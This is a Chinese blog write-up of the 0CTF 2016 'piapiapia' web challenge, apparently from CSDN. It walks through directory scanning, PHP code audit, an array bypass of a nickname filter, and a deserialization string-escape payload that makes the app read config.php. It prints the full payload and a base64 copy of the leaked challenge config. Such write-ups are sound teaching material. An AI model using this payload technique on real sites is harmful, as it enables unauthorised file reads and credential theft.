[0CTF 2016]piapiapia

已于 2023-09-13 18:10:26 修改
阅读量70 收藏 1
点赞数
分类专栏: CTF 文章标签: 前端 javascript linux web安全 网络安全 运维 服务器
于 2023-09-13 15:55:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wp568/article/details/132855546
版权

打开环境,sql注入各种测试,不是

使用工具dirsearch扫描目录,扫到文件www.zip,下载下来

使用工具Seay PHP代码审计工具 审计代码:

		$profile = unserialize($profile);	
		$phone = $profile['phone'];	
		$email = $profile['email'];	
		$nickname = $profile['nickname'];	
		$photo = base64_encode(file_get_contents($profile['photo']));

发现反序列化。

仔细研究代码,发现flag在config.php中

<?php	
	$config['hostname'] = '127.0.0.1';	
	$config['username'] = 'root';	
	$config['password'] = '';	
	$config['database'] = '';	
	$flag = '';	
?>

通过分析代码,

$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);

可以通过nickname来控制photo的值,从而造成逃逸(反序列化漏洞——键值逃逸

<?php
$profile['phone'] = '13500000000';
$profile['email'] = '123@qq.com';
$profile['nickname'] = 'hello';
$profile['photo'] = 'upload/' . md5('12345');
echo serialize($profile);
?>

a:4:{s:5:"phone";s:11:"13500000000";s:5:"email";s:10:"123@qq.com";s:8:"nickname";s:5:"hello";s:5:"photo";s:39:"upload/827ccb0eea8a706c4c34a16891f84e7b";}

用数组绕过nickname的正则过滤,即nickname[]

<?php
$profile['phone'] = '13500000000';
$profile['email'] = '123@qq.com';
$profile['nickname'] = ['hello'];
$profile['photo'] = 'upload/' . md5('12345');
echo serialize($profile);
?>

a:4:{s:5:"phone";s:11:"13500000000";s:5:"email";s:10:"123@qq.com";s:8:"nickname";a:1:{i:0;s:5:"hello";}s:5:"photo";s:39:"upload/827ccb0eea8a706c4c34a16891f84e7b";}

要将photo的内容替换成config.php,我们的想法就是要插入";}s:5:"photo";s:10:"config.php";},一共34个字符,要逃逸成功只需要长度增加34,把我们的目标给挤出去就行了,这里正好利用filter来将长度增长,假如我传入 where,那么被替换以后就是 hacker,长度增加了1,一共是34个 where

payload

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

后序列化内容

a:4:{s:5:"phone";s:11:"13500000000";s:5:"email";s:10:"123@qq.com";s:8:"nickname";a:1:{i:0;s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}s:39:"upload/827ccb0eea8a706c4c34a16891f84e7b";}

 

回到题目:

在register.php页面注册一个账号,然后登录,到了上传页面,burpsuit抓包

提交,有错,nickname过滤绕过:使用数组nickname[]

 

查看页面profile.php:

按F12看源码

data:image/gif;base64,PD9waHAKJGNvbmZpZ1snaG9zdG5hbWUnXSA9ICcxMjcuMC4wLjEnOwokY29uZmlnWyd1c2VybmFtZSddID0gJ3Jvb3QnOwokY29uZmlnWydwYXNzd29yZCddID0gJ3F3ZXJ0eXVpb3AnOwokY29uZmlnWydkYXRhYmFzZSddID0gJ2NoYWxsZW5nZXMnOwokZmxhZyA9ICdmbGFnezQ3NDIyMjhjLTlhMDItNGEyMy1iMDdkLTc5NGZjMGE2YjlmMX0nOwo/Pgo=

base64解码:

半两八金
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
主要介绍了0CTF-2016-piapiapia(php反序列化长度变化尾部字符串逃逸),本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
[0CTF 2016]piapiapia(反序列化逃逸)
paidx0
09-02 692
偷了三天懒没有学习,哈哈哈,通宵看完了扫黑风暴 开始做题 打开环境,第一时间以为是SQL注入,用sqlmap跑了一下,并不是 找了一下也没有什么东西,就去扫一下他的敏感目录,扫到www.zip,下载下来 先用Seay快速审计一下,再去细看代码逻辑 知识点 1、代码审计 2、反序列化逃逸 来一起看看代码吧 先看看可能存在文件读取的profile.php 首先想到的就是利用反序列化,然后文件读取,继续跟进 $profile = $user->show_profile($username); 再看in
[0CTF 2016]piapiapia 1
shinygod的博客
03-25 2194
知识点:字符串绕过长度限制 反序列字符串化逃逸 知识点 字符串绕过长度限制 例如: strlen($_POST['nickname']) > 10 我们可以传一个nickname[]来绕过。 反序列字符串化逃逸 这边的内容,可以看这篇文章: https://blog.csdn.net/shinygod/article/details/123284185 里面通过一个专门的题目详细讲解了反序列字符串化逃逸的两种情况。 解题思路 可以用dirsearch来扫,当然如果运气好的话说不定会直接找到
web buuctf [0CTF 2016]piapiapia
weixin_44214568的博客
04-11 772
知识点:1.反序列化字符串逃逸 1.开题 2.常规操作,看源码,查看robots.txt,disearch扫描 抓包,用常规的sql注入测试了一下,没啥效果,disearch扫描也结束了,看了下disearch扫描 有文件www.zip,是源码的一个包,下载下来 3.查看源码,没有路由文件,从index.php看,加载了config.php(里面有flag值),profile.php(会话已经加载的情况下读取信息),都看了一下文件,register.php(注册),注册了一个账号试了试,链
[0CTF 2016]piapiapia WP
shayebudon的博客
12-09 449
打开题目扫描一下发现wwww.zip文件下载 下载后可以看到 打开文件,查看内容,敏感处 profile.php有两处: unserialize和file_get_contents。 update.php的serialize 查看参数是怎么传到file_get_contents中 在profile.php中,是$profile数组里健名为photo的键值 $profile是通过show_profile函数传入,传入了username参数 show_profi...
2016华山杯ctf安卓题目
06-17
2016年华山杯ctf安卓题目
CTF Writeups 2016.9.29
09-29
CTF Writeups 2016.9.29
0ctf_2016_warmup
05-17
20160ctf的pwn题。
判断前端入参是否空否则提示前端写法
qq_39306234的博客
04-28 327
前端先声明一个变量,用于alert判断。在templeat中定义一个提示语句。然后在点击事件时判断一下是否展示。
前端调用WebSocket协议接口获取数据
m0_56023096的博客
04-29 428
createWs("测试数据", (res) => {
uni框架下的前端小知识
weixin_53908842的博客
04-30 315
1、direction:移动方向,可选值为all、vertical、horizontal分别表示所有方向、垂直、水平方向。3、out-of-bunds:移动超出界限是的处理策略,可选值为fail, bounce,分别表示失败、回弹。9、 scale-value:缩放的值,当scale为true时有效。7、friction:摩擦系数,取值范围【0,100】6、damping:阻尼系数,取值范围【0,100】8、scale:缩放比例,取值范围【0.5,10】4、x:水平方向的移动距离,单位制px。
基于若依框架搭建网站的开发日志(一):若依框架搭建、启动、部署
最新发布
lzh804121985的博客
05-05 833
若依是一款开源的基于Vue+SpringCloud的微服务后台管理系统(也有SpringBoot版本),集成了用户管理、权限管理、定时任务、前端表单生成等各种基础功能,对于像我这种前端代码写不了一点的玩家来说十分友好!
vue如何如何组合组件并通讯
codemami的博客
05-02 862
在Vue中,组件的组合和通讯是构建复杂应用的关键部分。Vue提供了多种方式来组合组件,并允许组件之间进行通讯。-- 子组件 ChildComponent.vue -->-- 子组件 ChildComponent.vue -->通过自定义事件($emit)来通知父组件。通过props属性向子组件传递数据。子组件通过props来接收数据。-- 父组件 -->-- 父组件 -->
彻底理清防抖和节流(前端性能优化)
夏日漱石的博客
04-28 878
前端有很多性能优化的方式,面对用户与网页的频繁交互,如输入框打字、按钮点击、滚动事件等,我们如何确保应用的响应既迅速又高效? 大家应该都简单了解防抖和节流本质上就是优化这种高频率执行代码的手段,那么他们之间有什么区别呢?应该如何正确根据具体的场景来选择使用呢?
[前端] Bearer令牌
好习惯成就伟大
04-28 170
Bearer令牌的安全性依赖于令牌的保密性和传输的安全性。因为任何拥有令牌的人都能访问资源,所以必须确保在传输过程中使用HTTPS来防止中间人攻击,并且存储时也要妥善保管,避免令牌泄露。此外,由于Bearer令牌的这一特点,相比其他类型如MAC(Message Authentication Code) tokens,它在安全性上要求更高的保护措施。服务器接收到请求后,会验证令牌的有效性(比如检查令牌是否过期、是否被撤销等),然后决定是否允许访问请求的资源。在HTTP请求中,Bearer令牌通常放在。
JavaScriptWeb APIs(三)
ma_no_lo的博客
05-03 932
Js中事件流和基本阻止方式,包含load,scroll,resize事件
3. uniapp开发工具的一些事
Oliver尹的博客
04-28 129
新的一天,又要开始卷起来了,程序开发当前离不开开发工具,一个好的开发工具办事起来那必然是事倍功半的...本文主要分享了关于开发工具的一些事~
使用Axios从前端上传文件并且下载后端返回的文件
哈哈哈哈哈哈哈哈的博客
05-03 234
【代码】使用Axios从前端上传文件并且下载后端返回的文件。
ctf从0到1电子书
12-14
《CTF从0到1》是一本针对CTF(Capture The Flag)竞赛的电子书,旨在帮助初学者快速入门和提高他们的技能。该书包括了CTF竞赛的基础知识、技巧和策略,并提供了详细的实例和实战练习,帮助读者从零开始逐步建立起自己的CTF技能。 该电子书首先介绍了CTF竞赛的概念和历史,并解释了CTF竞赛的基本流程和常见的攻击手法。接着,它深入解析了网络安全、逆向工程、加密和编程等相关的技术知识,帮助读者建立起坚实的基础。然后,书中提供了大量的实例和练习,让读者可以通过实践快速掌握所学的知识和技能。 通过该电子书的学习,读者可以逐步从CTF的入门级别进阶到中级和高级水平,掌握一系列解决问题的方法和技巧。并且,书中还强调了团队协作和解决问题的思维方式,帮助读者培养了解决实际问题的能力。 总的来说,《CTF从0到1》是一本非常实用的电子书,不仅可以帮助初学者快速入门CTF竞赛,还能帮助中级和高级选手提高他们的技能和水平。它准确把握了读者的需求,并通过丰富的实例和练习帮助他们从零开始建立起自己的CTF技能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半两八金

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值